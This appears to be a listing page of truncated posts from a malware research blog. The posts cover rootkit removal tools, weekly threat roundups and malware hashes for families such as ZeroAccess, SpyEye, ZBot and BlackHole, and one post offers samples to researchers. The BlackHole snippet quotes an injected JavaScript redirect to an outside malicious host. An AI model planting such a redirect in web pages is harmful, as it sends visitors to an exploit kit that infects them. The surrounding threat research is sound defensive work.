TDL FS dumper's
Kaspersky tdsskiller http://support.kaspersky.com/downloads/utils/tdsskiller.exeESET tdlfsreader http://eset.ru/tools/TdlFsReader.exetdsskiller firstFirst, edit options"Checking TDL FS" to OnPerforming...
View ArticleZeroAccess detection with Xuetr tool
Xuetr is a powerfull tool for hide_code/rootkit detection (available for download from http://www.xuetr.com/download/XueTr.zip).Run it on machine that was infected of latest ZeroAccess rootkit.After we...
View ArticleNecurs rootkit detection
Detailed information (and droppers too) available onhttp://www.kernelmode.info/forum/viewtopic.php?f=16&t=897http://www.kernelmode.info/forum/viewtopic.php?f=14&t=1177&p=8933#p8859Block...
View ArticleNew BlackHole features
I looked MDL today and suddenly discovered the following:New method of BlackHole spreading. js has the form:document.location='http://westarray.com/main.php?page=a68ea0edbb97ee5c';ISC wrote about that...
View ArticleRussian's election - hall of shame
1) In the day of election.Intermediate results:146,47 % - Special wrapping for pro-Kremlin party.2) DDos attacks on social networks and media, such as, St. Petersburg Novaya Gazeta, KartaNarusheniy.ru,...
View ArticleSpyEye removing with Xuetr tool
SpyEye is a famous trojan that steals your private data.Also known as EyeStye (Microsoft), Pincav (Kaspersky).Can be identified by any anti-rootkit: only user-mode hooks, no driver.Purpose of hooks is...
View ArticleDorkBot/NgrBot removing
Worm:Win32/Dorkbot.I - worm, based on IRC communication (DorkBot family) with a backdoor features.Also known as NgrBot, IRCBot.Like SpyEye may capture private user data, such as user names and...
View ArticleTop threats at last two weeks (20 Dec '11 - 3 Jan '12)
20 Dec '11 - 3 Jan '12New wave of Sinowal/Mebroot spreads.Wave of French ransoms - Trojan Ransom.At start of first week - Winlock/WindowsSecurity.FakeRean (Rogue:Win32/FakeRean), covers: XP Antispyware...
View ArticleTop threats of the week 3 Jan '12 - 7 Jan '12
3 Jan '12 - 7 Jan '12Sinowal/Mebroot.NgrBot/DorkBot/IRCBot.Caphaw.A - Backdoor.Password stealers (ZBot/SpyEye).Ramnit.Rogue: FakeRean, Winlock/Ransom, WindowsSecurity.Cridex.
View ArticleBlackHole spreads more and more malware
Trend of the last weeks is a BlackHole and that it spreads a lot of types of malware. In fact it password stealers and ransomware with which attackers get the most profit.So, the most widespread BH...
View ArticleTop threats of the month, Jan 2012
At first month of new 2012 year were observed, in general, a lot of various ransomware, fake antiviruses and passwords stealers. At first quarter of January there was new type of ransomware - Reveton....
View ArticleNew ZBot modifications
MD5: B52BD5D6B18A0A46FA062269BE3B639FSHA1: 104681a106148e47970ac6c31e83009640ed532bMD5: 376EC224F2931544E1A7C0703085B9DDSHA1: ed6a50d67e5e44e22c8950395f78102661a1a32eMD5:...
View ArticleBlackHole spreads ZeroAccess/Sirefef
With Kafeine observed that BlackHole group that is distributed Carberp in past, now distribute ZeroAccess.All samples were with FUD status. Couple of hashes:MD5: 4f7c964fe7011de17ccbce326591586fSHA1:...
View ArticleКомьюнити: Microsoft нарушила правила в деле ликвидации ZBot
Начало истории, вкратце:http://www.anti-malware.ru/forum/index.php?showtopic=21983Microsoft решила нанести удар (disrupt) по инфраструктуре ботнета, боты которого основаны на оригинальных кодах...
View ArticleMalware collection and research
Guys, I collected malware at last few month. If you need information or MD5 or samples for research purposes, leave message at post or send message at my VT profile at...
View ArticleБуткиты - тренд выживания малвари в современных условиях
Итак коротко, по сути и расставляя акценты в нужных местах.В начале обратимся к тому, что писал Symantec уже почти год назад. Статья называлась Are MBR Infections Back in Fashion? (Инфицирование MBR...
View ArticleFlamer goes ITW
Original CrySys very detailed and useful research http://www.crysys.hu/skywiper/skywiper.pdf.CrySys report was updated with adding of Kaspersky info about mssecmgr.ocx structure.Steps to infection:...
View ArticleZeroAccess - new steps in evolution
Already since a month ago ZeroAccess was updated. As we remember in previous versions it contained rootkit with VFS functionality and also modern self-defence method from AV-scanners. Also it infected...
View ArticleRemoving Pushbot worm with your hands
Research belongs to fresh version of Pushbot worm - Worm:Win32/Pushbot.VR.Dropper:MD5: 3e50b76c0066c314d224f4fd4cbf14d5SHA1: 8284814c5c5cb0f37fe200b918b65ef89c259a0aInfects via facebook spreading...
View ArticleInteresting malware of the month: trends and hashes
Interesting malware that already discussed at last month.1. ZeroAccess/Sirefef was updated. With feature of cross-platform file-infector and shellcode.SHA1: 23e1f3a819e4e4af58c4a6d5eb489b90ebd7ae8fMD5:...
View Article